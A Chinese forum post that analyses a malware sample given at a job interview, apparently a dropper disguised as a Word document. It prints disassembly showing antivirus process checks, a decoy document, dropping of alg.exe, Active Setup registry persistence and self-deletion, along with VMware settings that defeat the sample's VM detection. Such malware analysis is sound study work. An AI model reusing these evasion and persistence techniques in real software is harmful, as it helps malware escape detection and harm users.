去XXX公司面试,给了一个样本让自己分析一下。最后也没有给通知估计是没啥希望了。样本里面很多加密的地方,而且反且虚拟机。小弟能力有限只能进行了一个大致的功能分析。不足之处希望大牛多多指导。
通过查看代码没有看到检测系统中有没有vmware类似的服务、进程等信息的代码,
从而推断可能是利用后门法进行的检测然后在虚拟机配置文件中添加monitor_control.restrict_backdoor = TRUE,disable_acceleration = TRUE 把VMware的后门屏蔽,再次运行样本程序发现样本释放了一个新文件,释放的新文件
运行并且有连网操作,和之前没有屏蔽后门对比有了很大变化,从而可以断定绕过了样本的虚拟机检测部分。
**********************************************************************************************************
样本本身以word的图标伪装成word的外观 当用户双击病毒样本的时候遍历系统进程判断是否有avp.exe,360tray.exe,KSfafSvc.exe,RsTray.exe
以此判断是否杀毒软件运行。
1、当检测到杀毒软件运行时,会只创建一个文件“请您按照表格填写资料.doc”,保存在目录C:\DOCUME~1\AYL\LOCALS~1\Temp\请您按照表格填写资料.doc。
然后启动“请您按照表格填写资料.doc” ,让用户以为打开的就是真实的word文档。
2、当检测未检测到到杀毒软件运行时,创建一个文件“请您按照表格填写资料.doc”然后打开,并同时创建“alg.exe”保存在目录C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe
然后创建一个hostfix.bat批处理文件同样保存在C:\DOCUME~1\AYL\LOCALS~1\Temp\hostfix.bat。病毒程序最后会运行批处理hostfix.bat文件删除自身。
病毒样本运行时会修改注册表把cr.sa.exe(应该为病毒本身)和alg.exe添加到Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\
伪装成系统组建,从而达到系统启动前就运行的目的,从而逃避过杀软的检测。
通过kernel32.GetVolumeInformationA获取C盘信息
iphlpapi.GetAdaptersInfo本地网卡和IP信息 把这部分写入生成的文件alg.exe 用于连网时使用
该样本许多重要部分加密,由于技术不是很好没能一一分析出,只把部分关键代码贴出来
**********************************************************************************************************
00402897 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
0040289A . C745 E4 00000>mov dword ptr ss:[ebp-0x1C],0x0
004028A1 . B9 06000000 mov ecx,0x6
004028A6 . BE 2CC54000 mov esi,sample(?0040C52C ; UNICODE "hostfix.bat"
004028AB . 8D7D CC lea edi,dword ptr ss:[ebp-0x34]
004028AE . F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi]
004028B0 . E8 76F0FFFF call sample(?0040192B
004028B5 . E8 E2EFFFFF call sample(?0040189C ; 打开样本文件 读取内容 返回CreateProcessW 句柄
004028BA . E8 9AF6FFFF call sample(?00401F59 ; 检测是否存在杀毒软件进程
004028BF > A1 5CD84000 mov eax,dword ptr ds:[0x40D85C]
004028C4 . 8378 18 00 cmp dword ptr ds:[eax+0x18],0x0
004028C8 . 74 16 je Xsample(?004028E0
004028CA . 68 384A0000 push 0x4A38
004028CF . E8 DF120000 call sample(?00403BB3
004028D4 . 83C4 04 add esp,0x4
004028D7 . 8B0D 5CD84000 mov ecx,dword ptr ds:[0x40D85C]
004028DD . FF51 18 call dword ptr ds:[ecx+0x18]
004028E0 > 33D2 xor edx,edx
004028E2 . 85D2 test edx,edx
004028E4 .^ 75 D9 jnz Xsample(?004028BF
004028E6 . E8 11F1FFFF call sample(?004019FC ; 创建并 打开文件
004028EB > A1 5CD84000 mov eax,dword ptr ds:[0x40D85C]
**********************************************************************************************************
检测是否有杀软程序运行
004028BA . E8 9AF6FFFF call sample(?00401F59 ; 检测是否存在杀毒软件进程
***********************************************************************************************************
00401F59 /$ 55 push ebp
00401F5A |. 8BEC mov ebp,esp
00401F5C |. 51 push ecx
00401F5D |. C745 FC 00000>mov [local.1],0x0
00401F64 |. E8 17100000 call sample(?00402F80 ; 检索指定的系统信息
00401F69 |. 8945 FC mov [local.1],eax
00401F6C |. 68 18C34000 push sample(?0040C318 ; ASCII "avp.exe"
00401F71 |. 8B45 FC mov eax,[local.1]
00401F74 |. 50 push eax
00401F75 |. E8 61110000 call sample(?004030DB
00401F7A |. 83C4 08 add esp,0x8
00401F7D |. 85C0 test eax,eax
00401F7F |. 74 11 je Xsample(?00401F92
00401F81 |. 8B0D 60D84000 mov ecx,dword ptr ds:[0x40D860]
00401F87 |. 890D 60D84000 mov dword ptr ds:[0x40D860],ecx
00401F8D |. E9 A4000000 jmp sample(?00402036
00401F92 |> 6A 1F push 0x1F
00401F94 |. E8 D8140000 call sample(?00403471
00401F99 |. 83C4 04 add esp,0x4
00401F9C |. 50 push eax
00401F9D |. 8B55 FC mov edx,[local.1]
00401FA0 |. 52 push edx
00401FA1 |. E8 35110000 call sample(?004030DB ; 检测360tray.exe
00401FA6 |. 83C4 08 add esp,0x8
00401FA9 |. 85C0 test eax,eax
00401FAB |. 74 18 je Xsample(?00401FC5
00401FAD |. 6A 1F push 0x1F
00401FAF |. E8 2C140000 call sample(?004033E0
00401FB4 |. 83C4 04 add esp,0x4
00401FB7 |. A1 60D84000 mov eax,dword ptr ds:[0x40D860]
00401FBC |. 0C 01 or al,0x1
00401FBE |. A3 60D84000 mov dword ptr ds:[0x40D860],eax
00401FC3 |. EB 71 jmp Xsample(?00402036
00401FC5 |> 6A 20 push 0x20
00401FC7 |. E8 A5140000 call sample(?00403471
00401FCC |. 83C4 04 add esp,0x4
00401FCF |. 50 push eax
00401FD0 |. 8B4D FC mov ecx,[local.1]
00401FD3 |. 51 push ecx
00401FD4 |. E8 02110000 call sample(?004030DB ; 检测KSafeSvc.exe
00401FD9 |. 83C4 08 add esp,0x8
00401FDC |. 85C0 test eax,eax
00401FDE |. 74 1B je Xsample(?00401FFB
00401FE0 |. 6A 20 push 0x20
00401FE2 |. E8 F9130000 call sample(?004033E0
00401FE7 |. 83C4 04 add esp,0x4
00401FEA |. 8B15 60D84000 mov edx,dword ptr ds:[0x40D860]
00401FF0 |. 83CA 02 or edx,0x2
00401FF3 |. 8915 60D84000 mov dword ptr ds:[0x40D860],edx
00401FF9 |. EB 3B jmp Xsample(?00402036
00401FFB |> 6A 21 push 0x21
00401FFD |. E8 6F140000 call sample(?00403471
00402002 |. 83C4 04 add esp,0x4
00402005 |. 50 push eax
00402006 |. 8B45 FC mov eax,[local.1]
00402009 |. 50 push eax
0040200A |. E8 CC100000 call sample(?004030DB ; 检测RsTray.exe
0040200F |. 83C4 08 add esp,0x8
00402012 |. 85C0 test eax,eax
**********************************************************************************************************
**********************************************************************************************************
004019FF |. 81EC 1C060000 sub esp,0x61C
00401A05 |> 6A 24 /push 0x24
00401A07 |. E8 651A0000 |call sample(?00403471 ; 获得字符串ShellExecuteW
00401A0C |. 83C4 04 |add esp,0x4
00401A0F |. 50 |push eax
00401A10 |. 6A 22 |push 0x22
00401A12 |. E8 5A1A0000 |call sample(?00403471 ; 获得字符串Shell32.dll
00401A17 |. 83C4 04 |add esp,0x4
00401A1A |. 50 |push eax ; |/FileName
00401A1B |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401A21 |. 50 |push eax ; |hModule
00401A22 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00401A28 |. A3 58D84000 |mov dword ptr ds:[0x40D858],eax
00401A2D |. 833D 58D84000>|cmp dword ptr ds:[0x40D858],0x0 ; 获得ShellExecuteW的句柄
00401A34 |. 75 15 |jnz Xsample(?00401A4B
00401A36 |. 68 88C24000 |push sample(?0040C288 ; ASCII "GetProcAddress"
00401A3B |. E8 3A1C0000 |call sample(?0040367A
00401A40 |. 83C4 04 |add esp,0x4
00401A43 |. 8985 E4F9FFFF |mov [local.391],eax
00401A49 |. EB 0A |jmp Xsample(?00401A55
00401A4B |> C785 E4F9FFFF>|mov [local.391],0x1
00401A55 |> 6A 22 |push 0x22
00401A57 |. E8 84190000 |call sample(?004033E0
00401A5C |. 83C4 04 |add esp,0x4
00401A5F |. 6A 24 |push 0x24
00401A61 |. E8 7A190000 |call sample(?004033E0
00401A66 |. 83C4 04 |add esp,0x4
00401A69 |. 33C0 |xor eax,eax
00401A6B |. 85C0 |test eax,eax
00401A6D |.^ 75 96 \jnz Xsample(?00401A05
00401A6F |. 8D8D E8F9FFFF lea ecx,[local.390]
00401A75 |. 51 push ecx ; /Buffer
00401A76 |. 68 04010000 push 0x104 ; |BufSize = 104 (260.)
00401A7B |. FF15 30B04000 call dword ptr ds:[<&KERNEL32.GetTempPathW>] ; \GetTempPathW
00401A81 |. 85C0 test eax,eax ; 获得临时目录C:\DOCUME~1\AYL\LOCALS~1\Temp\
00401A83 |. 75 07 jnz Xsample(?00401A8C
00401A85 |. 6A 00 push 0x0
00401A87 |. E8 952F0000 call sample(?00404A21
00401A8C |> 68 04254100 push sample(?00412504
00401A91 |. 8D95 F8FDFFFF lea edx,[local.130]
00401A97 |. 52 push edx
00401A98 |. 8D85 E8F9FFFF lea eax,[local.390]
00401A9E |. 50 push eax
00401A9F |. E8 C7F5FFFF call sample(?0040106B ; C:\DOCUME~1\AYL\LOCALS~1\Temp\请您按照表格填写资料.doc
00401AA4 |. 83C4 0C add esp,0xC
00401AA7 |. 68 14254100 push sample(?00412514
00401AAC |. 8D8D F8FDFFFF lea ecx,[local.130]
00401AB2 |. 51 push ecx
00401AB3 |. 68 04254100 push sample(?00412504
00401AB8 |. 8B15 50D84000 mov edx,dword ptr ds:[0x40D850]
00401ABE |. 52 push edx
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; 创建 文件 请您按照表格填写资料.doc
00401AC4 |. 83C4 10 add esp,0x10
00401AC7 |. 85C0 test eax,eax
**********************************************************************************************************
创建文件
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; 创建 文件 请您按照表格填写资料.doc
**********************************************************************************************************
00401559 |. 8B51 04 mov edx,dword ptr ds:[ecx+0x4]
0040155C |. 8955 E0 mov [local.8],edx
0040155F |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401561 |. 6A 00 push 0x0 ; |Attributes = 0
00401563 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401565 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401567 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401569 |. 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
0040156E |. 8B45 10 mov eax,[arg.3] ; |
00401571 |. 50 push eax ; |FileName
00401572 |. FF15 20B04000 call dword ptr ds:[<&KERNEL32.CreateFileW>] ; \CreateFileW
00401578 |. 8985 D4FDFFFF mov [local.139],eax ; 创建文件 请您按照表格填写资料.doc
0040157E |. 83BD D4FDFFFF>cmp [local.139],-0x1
00401585 |. 75 18 jnz Xsample(?0040159F
00401587 |. 8B4D 10 mov ecx,[arg.3]
0040158A |. 51 push ecx
0040158B |. 68 E0C04000 push sample(?0040C0E0 ; UNICODE "path = %ls
"
00401590 |. E8 2E340000 call sample(?004049C3
00401595 |. 83C4 08 add esp,0x8
00401598 |. 33C0 xor eax,eax
0040159A |. E9 F9020000 jmp sample(?00401898
0040159F |> 6A 00 push 0x0 ; /Origin = FILE_BEGIN
004015A1 |. 6A 00 push 0x0 ; |pOffsetHi = NULL
004015A3 |. 8B55 0C mov edx,[arg.2] ; |
004015A6 |. 8B02 mov eax,dword ptr ds:[edx] ; |
004015A8 |. 50 push eax ; |OffsetLo
004015A9 |. 8B4D 08 mov ecx,[arg.1] ; |
004015AC |. 51 push ecx ; |hFile
004015AD |. FF15 1CB04000 call dword ptr ds:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
004015B3 |. 8945 EC mov [local.5],eax
……
00401602 |. 8985 CCFDFFFF mov [local.141],eax
00401608 |. 83BD CCFDFFFF>cmp [local.141],0x0
0040160F |. 75 07 jnz Xsample(?00401618
00401611 |. 33C0 xor eax,eax
00401613 |. E9 80020000 jmp sample(?00401898
00401618 |> 6A 00 push 0x0 ; /pOverlapped = NULL
0040161A |. 8D55 F0 lea edx,[local.4] ; |
0040161D |. 52 push edx ; |pBytesRead
0040161E |. 8B45 E0 mov eax,[local.8] ; |
00401621 |. 50 push eax ; |BytesToRead
00401622 |. 8B8D D0FDFFFF mov ecx,[local.140] ; |
00401628 |. 51 push ecx ; |Buffer
00401629 |. 8B55 08 mov edx,[arg.1] ; |
0040162C |. 52 push edx ; |hFile
0040162D |. FF15 18B04000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401633 |. 85C0 test eax,eax
00401635 |. 75 07 jnz Xsample(?0040163E
……
00401832 |. 83C4 0C add esp,0xC ; 写文件
00401835 |> 6A 00 push 0x0 ; /pOverlapped = NULL
00401837 |. 8D4D F0 lea ecx,[local.4] ; |
0040183A |. 51 push ecx ; |pBytesWritten
0040183B |. 8B55 0C mov edx,[arg.2] ; |
0040183E |. 8B42 08 mov eax,dword ptr ds:[edx+0x8] ; |
00401841 |. 50 push eax ; |nBytesToWrite
00401842 |. 8B8D CCFDFFFF mov ecx,[local.141] ; |
00401848 |. 51 push ecx ; |Buffer
00401849 |. 8B95 D4FDFFFF mov edx,[local.139] ; |
0040184F |. 52 push edx ; |hFile
00401850 |. FF15 14B04000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401856 |. 85C0 test eax,eax
**********************************************************************************************************
以编辑的方式打开创建的文件 “请您按照表格填写资料.doc”
00401AF3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401AF9 |. 52 push edx
00401AFA |. 68 CCC24000 push sample(?0040C2CC ; UNICODE "edit"
00401AFF |. 6A 00 push 0x0
00401B01 |. FF15 58D84000 call dword ptr ds:[0x40D858]
00401B07 |. 83C4 18 add esp,0x18 ; 打开 创建的文件
00401B0A |. 8BE5 mov esp,ebp
00401B0C |. 5D pop ebp
获取要生成的文件名字 "C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"
**********************************************************************************************************
00401B33 . 57 push edi
00401B34 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
00401B37 . 8D85 C8F8FFFF lea eax,dword ptr ss:[ebp-0x738]
00401B3D . 50 push eax ; /Buffer
00401B3E . 68 04010000 push 0x104 ; |BufSize = 104 (260.)
00401B43 . FF15 30B04000 call dword ptr ds:[<&KERNEL32.GetTempPathW>] ; \GetTempPathW
00401B49 . 85C0 test eax,eax
00401B4B . 75 07 jnz Xsample(?00401B54
00401B4D . 6A 00 push 0x0
00401B4F . E8 CD2E0000 call sample(?00404A21
00401B54 > 68 E0234100 push sample(?004123E0
00401B59 . 8D8D D0FAFFFF lea ecx,dword ptr ss:[ebp-0x530]
00401B5F . 51 push ecx
00401B60 . 8D95 C8F8FFFF lea edx,dword ptr ss:[ebp-0x738]
00401B66 . 52 push edx
00401B67 . E8 FFF4FFFF call sample(?0040106B ; 获取要生成的文件名字 "C:\DOCUME~1\AYL\LOCALS~1\Temp\alg.exe"
00401B6C . 83C4 0C add esp,0xC
……
0040107E |. 50 push eax
0040107F |. E8 7C310000 call sample(?00404200 ; _memset
00401084 |. 83C4 0C add esp,0xC
00401087 |. 68 08020000 push 0x208
0040108C |. 6A 00 push 0x0
0040108E |. 8D8D F8FDFFFF lea ecx,[local.130]
00401094 |. 51 push ecx
00401095 |. E8 66310000 call sample(?00404200 ; _memset
0040109A |. 83C4 0C add esp,0xC
0040109D |. 68 04010000 push 0x104
004010A2 |. 8B55 08 mov edx,[arg.1]
004010A5 |. 52 push edx
004010A6 |. 8B45 0C mov eax,[arg.2]
004010A9 |. 50 push eax
004010AA |. E8 0C310000 call sample(?004041BB ; _wcsncpy
004010AF |. 83C4 0C add esp,0xC
004010B2 |. 68 04010000 push 0x104 ; /WideBufSize = 104 (260.)
004010B7 |. 8D8D F8FDFFFF lea ecx,[local.130] ; |
004010BD |. 51 push ecx ; |WideCharBuf
004010BE |. 6A FF push -0x1 ; |StringSize = FFFFFFFF (-1.)
004010C0 |. 8B55 10 mov edx,[arg.3] ; |
004010C3 |. 83C2 20 add edx,0x20 ; |
004010C6 |. 52 push edx ; |StringToMap
004010C7 |. 6A 00 push 0x0 ; |Options = 0
004010C9 |. 6A 00 push 0x0 ; |CodePage = CP_ACP
004010CB |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
004010D1 |. 8D85 F8FDFFFF lea eax,[local.130] ; eax = alg.exe
004010D7 |. 50 push eax ; /StringToAdd
004010D8 |. 8B4D 0C mov ecx,[arg.2] ; |
004010DB |. 51 push ecx ; |ConcatString
004010DC |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrcatW>] ; \lstrcatW
004010E2 |. 8BE5 mov esp,ebp
004010E4 |. 5D pop ebp
004010E5 \. C3 retn
**********************************************************************************************************
创建文件alg.exe
**********************************************************************************************************
00401556 |. 8B4D 0C mov ecx,[arg.2] ; sample(?004123E0
00401559 |. 8B51 04 mov edx,dword ptr ds:[ecx+0x4]
0040155C |. 8955 E0 mov [local.8],edx
0040155F |. 6A 00 push 0x0 ; /hTemplateFile = NULL
00401561 |. 6A 00 push 0x0 ; |Attributes = 0
00401563 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401565 |. 6A 00 push 0x0 ; |pSecurity = NULL
00401567 |. 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401569 |. 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
0040156E |. 8B45 10 mov eax,[arg.3] ; |
00401571 |. 50 push eax ; |FileName
00401572 |. FF15 20B04000 call dword ptr ds:[<&KERNEL32.CreateFileW>] ; \CreateFileW
00401578 |. 8985 D4FDFFFF mov [local.139],eax ; 创建文件 alg.exe
0040157E |. 83BD D4FDFFFF>cmp [local.139],-0x1
00401585 |. 75 18 jnz Xsample(?0040159F
00401587 |. 8B4D 10 mov ecx,[arg.3]
……
设置文件指针
0040159F |> \6A 00 push 0x0 ; /Origin = FILE_BEGIN
004015A1 |. 6A 00 push 0x0 ; |pOffsetHi = NULL
004015A3 |. 8B55 0C mov edx,[arg.2] ; |
004015A6 |. 8B02 mov eax,dword ptr ds:[edx] ; |
004015A8 |. 50 push eax ; |OffsetLo
004015A9 |. 8B4D 08 mov ecx,[arg.1] ; |
004015AC |. 51 push ecx ; |hFile
004015AD |. FF15 1CB04000 call dword ptr ds:[<&KERNEL32.SetFilePointer>] ; \SetFilePointer
004015B3 |. 8945 EC mov [local.5],eax
004015B6 |. 837D EC FF cmp [local.5],-0x1
004015BA |. 75 07 jnz Xsample(?004015C3
……
读文件
00401611 |. 33C0 xor eax,eax
00401613 |. E9 80020000 jmp sample(?00401898
00401618 |> 6A 00 push 0x0 ; /pOverlapped = NULL
0040161A |. 8D55 F0 lea edx,[local.4] ; |
0040161D |. 52 push edx ; |pBytesRead
0040161E |. 8B45 E0 mov eax,[local.8] ; |
00401621 |. 50 push eax ; |BytesToRead
00401622 |. 8B8D D0FDFFFF mov ecx,[local.140] ; |
00401628 |. 51 push ecx ; |Buffer
00401629 |. 8B55 08 mov edx,[arg.1] ; |
0040162C |. 52 push edx ; |hFile
0040162D |. FF15 18B04000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401633 |. 85C0 test eax,eax
************************************************************************************************************
获取C盘信息
************************************************************************************************************
00403874 |. C745 FC 00000>mov [local.1],0x0
0040387B |. C785 ECFEFFFF>mov [local.69],0x0
00403885 |. C785 F0FEFFFF>mov [local.68],-0x1
0040388F |> 6A 05 /push 0x5
00403891 |. E8 DBFBFFFF |call sample(?00403471 ; GetVolumeInformationA
00403896 |. 83C4 04 |add esp,0x4
00403899 |. 50 |push eax
0040389A |. 6A 02 |push 0x2
0040389C |. E8 D0FBFFFF |call sample(?00403471 ; Kernel32.dll
004038A1 |. 83C4 04 |add esp,0x4
004038A4 |. 50 |push eax ; |/FileName
004038A5 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
004038AB |. 50 |push eax ; |hModule
004038AC |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
004038B2 |. A3 CCD84000 |mov dword ptr ds:[0x40D8CC],eax
004038B7 |. 833D CCD84000>|cmp dword ptr ds:[0x40D8CC],0x0
004038BE |. 75 15 |jnz Xsample(?004038D5
004038C0 |. 68 ECCC4000 |push sample(?0040CCEC ; ASCII "GetProcAddress"
004038C5 |. E8 B0FDFFFF |call sample(?0040367A
004038CA |. 83C4 04 |add esp,0x4
004038CD |. 8985 DCFDFFFF |mov [local.137],eax
004038D3 |. EB 0A |jmp Xsample(?004038DF
004038D5 |> C785 DCFDFFFF>|mov [local.137],0x1
004038DF |> 6A 02 |push 0x2
004038E1 |. E8 FAFAFFFF |call sample(?004033E0
004038E6 |. 83C4 04 |add esp,0x4
004038E9 |. 6A 05 |push 0x5
004038EB |. E8 F0FAFFFF |call sample(?004033E0
004038F0 |. 83C4 04 |add esp,0x4
004038F3 |. 33C0 |xor eax,eax
004038F5 |. 85C0 |test eax,eax
004038F7 |.^ 75 96 \jnz Xsample(?0040388F
004038F9 |. 68 05010000 push 0x105
004038FE |. 8D8D F4FEFFFF lea ecx,[local.67]
00403904 |. 51 push ecx
00403905 |. 8D95 ECFEFFFF lea edx,[local.69]
0040390B |. 52 push edx
0040390C |. 8D45 FC lea eax,[local.1]
0040390F |. 50 push eax
00403910 |. 8D8D E8FEFFFF lea ecx,[local.70]
00403916 |. 51 push ecx
00403917 |. 68 05010000 push 0x105
0040391C |. 8D95 E0FDFFFF lea edx,[local.136]
00403922 |. 52 push edx
00403923 |. 68 FCCC4000 push sample(?0040CCFC ; ASCII "C:\"
00403928 |. FF15 CCD84000 call dword ptr ds:[0x40D8CC] ; kernel32.GetVolumeInformationA
0040392E |. 8985 F0FEFFFF mov [local.68],eax
00403934 |. 8B85 E8FEFFFF mov eax,[local.70] ;返回装载磁盘卷序列号的变量
获取本地网卡信息 为后面的alg.exe联网做准备
00403947 |. E8 F41A0000 call sample(?00405440 ; __alloca_probe
0040394C |. 8D85 FCD7FFFF lea eax,[local.2561]
00403952 |. 8945 FC mov [local.1],eax
00403955 |. C785 F4D7FFFF>mov [local.2563],0x2800
0040395F |> 6A 06 /push 0x6
00403961 |. E8 0BFBFFFF |call sample(?00403471 ; GetAdaptersInfo
00403966 |. 83C4 04 |add esp,0x4
00403969 |. 50 |push eax
0040396A |. 6A 03 |push 0x3
0040396C |. E8 00FBFFFF |call sample(?00403471 ; Iphlpapi.dll
00403971 |. 83C4 04 |add esp,0x4
00403974 |. 50 |push eax ; |/FileName
00403975 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
0040397B |. 50 |push eax ; |hModule
0040397C |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00403982 |. A3 D0D84000 |mov dword ptr ds:[0x40D8D0],eax
00403987 |. 833D D0D84000>|cmp dword ptr ds:[0x40D8D0],0x0
0040398E |. 75 15 |jnz Xsample(?004039A5
00403990 |. 68 00CD4000 |push sample(?0040CD00 ; ASCII "GetProcAddress"
00403995 |. E8 E0FCFFFF |call sample(?0040367A
0040399A |. 83C4 04 |add esp,0x4
0040399D |. 8985 F0D7FFFF |mov [local.2564],eax
004039A3 |. EB 0A |jmp Xsample(?004039AF
004039A5 |> C785 F0D7FFFF>|mov [local.2564],0x1
004039AF |> 6A 03 |push 0x3
004039B1 |. E8 2AFAFFFF |call sample(?004033E0
004039B6 |. 83C4 04 |add esp,0x4
004039B9 |. 6A 06 |push 0x6
004039BB |. E8 20FAFFFF |call sample(?004033E0
004039C0 |. 83C4 04 |add esp,0x4
004039C3 |. 33C9 |xor ecx,ecx
004039C5 |. 85C9 |test ecx,ecx
004039C7 |.^ 75 96 \jnz Xsample(?0040395F
004039C9 |. 8D95 F4D7FFFF lea edx,[local.2563]
004039CF |. 52 push edx
004039D0 |. 8D85 FCD7FFFF lea eax,[local.2561]
004039D6 |. 50 push eax
004039D7 |. FF15 D0D84000 call dword ptr ds:[0x40D8D0] ; iphlpapi.GetAdaptersInfo
004039DD |. 83C4 08 add esp,0x8
004039E0 |. 8985 F8D7FFFF mov [local.2562],eax
004039E6 |. 83BD F8D7FFFF>cmp [local.2562],0x0
004039ED |. 75 1A jnz Xsample(?00403A09
004039EF |. 6A 06 push 0x6
004039F1 |. 8B4D FC mov ecx,[local.1]
004039F4 |. 81C1 94010000 add ecx,0x194
004039FA |. 51 push ecx
004039FB |. 8B55 08 mov edx,[arg.1]
004039FE |. 52 push edx
004039FF |. E8 9C080000 call sample(?004042A0 ; _memcpy
00403A04 |. 83C4 0C add esp,0xC
00403A07 |. EB 13 jmp Xsample(?00403A1C
00403A09 |> 6A 06 push 0x6
00403A0B |. 68 10CD4000 push sample(?0040CD10
00403A10 |. 8B45 08 mov eax,[arg.1]
00403A13 |. 50 push eax
00403A14 |. E8 87080000 call sample(?004042A0
00403A19 |. 83C4 0C add esp,0xC
00403A1C |> 8BE5 mov esp,ebp
00403A1E |. 5D pop ebp
……
将获得C盘信息 和本地网卡信息写入alg.exe文件 为后面联网做准备
0040182D |. E8 60FCFFFF call sample(?00401492
00401832 |. 83C4 0C add esp,0xC ; 写文件
00401835 |> 6A 00 push 0x0 ; /pOverlapped = NULL
00401837 |. 8D4D F0 lea ecx,[local.4] ; |
0040183A |. 51 push ecx ; |pBytesWritten
0040183B |. 8B55 0C mov edx,[arg.2] ; |
0040183E |. 8B42 08 mov eax,dword ptr ds:[edx+0x8] ; |
00401841 |. 50 push eax ; |nBytesToWrite
00401842 |. 8B8D CCFDFFFF mov ecx,[local.141] ; |
00401848 |. 51 push ecx ; |Buffer
00401849 |. 8B95 D4FDFFFF mov edx,[local.139] ; |
0040184F |. 52 push edx ; |hFile
00401850 |. FF15 14B04000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401856 |. 85C0 test eax,eax
00401858 |. 75 04 jnz Xsample(?0040185E
0040185A |. 33C0 xor eax,eax
……
获取随机数
00401CE1 > \8D95 D0FAFFFF lea edx,dword ptr ss:[ebp-0x530]
00401CE7 . 52 push edx
00401CE8 . 68 F0C24000 push sample(?0040C2F0 ; UNICODE "exe path = %ls"
00401CED . E8 D12C0000 call sample(?004049C3 ; _wprintf
00401CF2 . 83C4 08 add esp,0x8
00401CF5 > 6A 00 push 0x0
00401CF7 . E8 01290000 call sample(?004045FD ; _time
00401CFC . 83C4 04 add esp,0x4
00401CFF . 50 push eax
00401D00 . E8 D0280000 call sample(?004045D5 ; 赋值 步过
00401D05 . 83C4 04 add esp,0x4
00401D08 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
00401D0F > B8 01000000 mov eax,0x1
00401D14 . 85C0 test eax,eax
00401D16 . 74 1A je Xsample(?00401D32
00401D18 . E8 C2280000 call sample(?004045DF ; _rand
00401D1D . 8985 C4F8FFFF mov dword ptr ss:[ebp-0x73C],eax ; 获取随机数
00401D23 . E8 B7280000 call sample(?004045DF ; _rand
00401D28 . 8B8D C4F8FFFF mov ecx,dword ptr ss:[ebp-0x73C]
……
修改注册表信息Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\
将病毒 写入 系统组件 可以是病毒在系统运行前就运行起来
004022B6 |. 83EC 38 sub esp,0x38
004022B9 |. C745 D0 00000>mov [local.12],0x0
004022C0 |. 6A 00 push 0x0
004022C2 |. 68 00080000 push 0x800
004022C7 |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022CC |. E8 2F1F0000 call sample(?00404200 ; _memset
004022D1 |. 83C4 0C add esp,0xC
004022D4 |. 6A 00 push 0x0
004022D6 |. E8 22230000 call sample(?004045FD ; _time
004022DB |. 83C4 04 add esp,0x4
004022DE |. 50 push eax
004022DF |. E8 F1220000 call sample(?004045D5 ; 赋值 步过
004022E4 |. 83C4 04 add esp,0x4
004022E7 |. 68 80C34000 push sample(?0040C380 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022EC |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022F1 |. E8 00280000 call sample(?00404AF6 ; _swprintf
004022F6 |. 83C4 08 add esp,0x8
004022F9 |. 68 C01B4100 push sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
004022FE |. E8 3A2C0000 call sample(?00404F3D ; _wcslen
00402303 |. 83C4 04 add esp,0x4
00402306 |. D1E0 shl eax,1
00402308 |. 66:8945 FA mov word ptr ss:[ebp-0x6],ax
0040230C |. 66:8B45 FA mov ax,word ptr ss:[ebp-0x6]
00402310 |. 66:8945 F8 mov word ptr ss:[ebp-0x8],ax
00402314 |. C745 FC C01B4>mov [local.1],sample(?00411BC0 ; UNICODE "\Registry\Machine\SOFTWARE\Microsoft\Active Setup\Installed Components\{38B0D69C-E704-E2C6-EC2A-CDF3"
0040231B |> 6A 09 /push 0x9
0040231D |. E8 4F110000 |call sample(?00403471 ; NtCreateKey
00402322 |. 83C4 04 |add esp,0x4
00402325 |. 50 |push eax
00402326 |. 6A 01 |push 0x1
00402328 |. E8 44110000 |call sample(?00403471 ; ntdll.dll
0040232D |. 83C4 04 |add esp,0x4
00402330 |. 50 |push eax ; |/FileName
00402331 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
00402337 |. 50 |push eax ; |hModule
